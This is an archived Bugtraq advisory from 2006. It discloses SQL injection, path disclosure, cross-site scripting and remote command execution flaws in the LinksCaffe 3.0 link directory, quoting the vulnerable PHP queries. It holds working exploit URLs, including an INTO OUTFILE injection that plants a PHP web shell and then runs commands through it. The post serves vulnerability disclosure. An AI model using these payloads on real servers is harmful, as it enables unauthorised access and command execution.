Home page logo
/

bugtraq logo Bugtraq mailing list archives

LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties
From: simo64 () gmail com
Date: 25 Jul 2006 06:48:19 -0000

LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties

Produce       : LinksCaffe 3.0
Website       : http://gonafish.com/
Impact        : manupulation of data / system access
Discovered by : Simo64 - Moroccan Security Team

[+] SQL injection
******************

  [1]Vulnerable code in line 223 in links.php

        code : 

        $rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, 
link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());

        $offset and $limit vars are not sanitized before to be used to conducte sql injection attacks

        Exploit : 

        http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]
        http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]
  
  [2]   Vulnerable code in line 516 in links.php
  
  code : 

        if (!$newdays)
        {
        $newdays=$daysnew;
        }
        else
        {
        $newdays=$newdays;
        }
        
        $rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND 
link_val = 'yes'") or die(mysql_error());
                        
        Exploit :
        http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]
        
        
  [3]   Vulnerable code in line 516 in links.php
  
  code :
  
  if ($action=="deadlink")
        {
        ........
        $rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());
        while($row = mysql_fetch_array($rime)) {
        extract($row);
        echo "<li><font class=text10><a href='$link_url' target='_blank'>$link_name</a><br>$link_desc<br></font></li>";
        echo "<input type = 'hidden' name = 'link_id' value='$link_id'><input type = 'hidden' name = 'cat_id' 
value='$cat_id'><input type = 'hidden' name = 'link_name' value='$link_name'>
        <input type = 'hidden' name = 'link_url' value='$link_url'><input type = 'hidden' name = 'link_desc' 
value='$link_desc'><input type = 'hidden' name = 'link_email' value='$link_email'><br><input type = 'submit' value = 
'Dead Link'>";
        }
        
        $link_id var are not sanitized before to be used to conducte sql injection attacks
        
        Exploit :
        
        http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]
        
[+] FullPath disclosure :

PoC : 

        http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*
        
        Result :
        
        Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on 
line 540

        Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on 
line 549

        Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on 
line 554
        
[+] Remote Command Execution
*****************************
        
if magic_quote_gpc == OFF we can create a shell in writable folder using (3)!!

Exploit :
        
http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,&apos;<?passthru(\$_GET[\'cmd\']);?>',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*
        
after we can exec cmds
        
http://localhost/linkscaffe/pipo.php?cmd=ls;id



[+] Cross Site Scripting 
*************************

$tablewidth var in counter.php is not sanitized before to be used to conducte xss attacks
$newdays var in links.php is not sanitized before to be used to conducte xss attacks
$tableborder,$menucolor,$textcolor,$bodycolor vars in links.php are not sanitized before to be used to conducte xss 
attacks

PoC : 

http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+

http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]

http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]



Contact : simo64 () gmail com

greetz to all friends !


  By Date           By Thread  

Current thread:
  • LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties simo64 (Jul 25)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault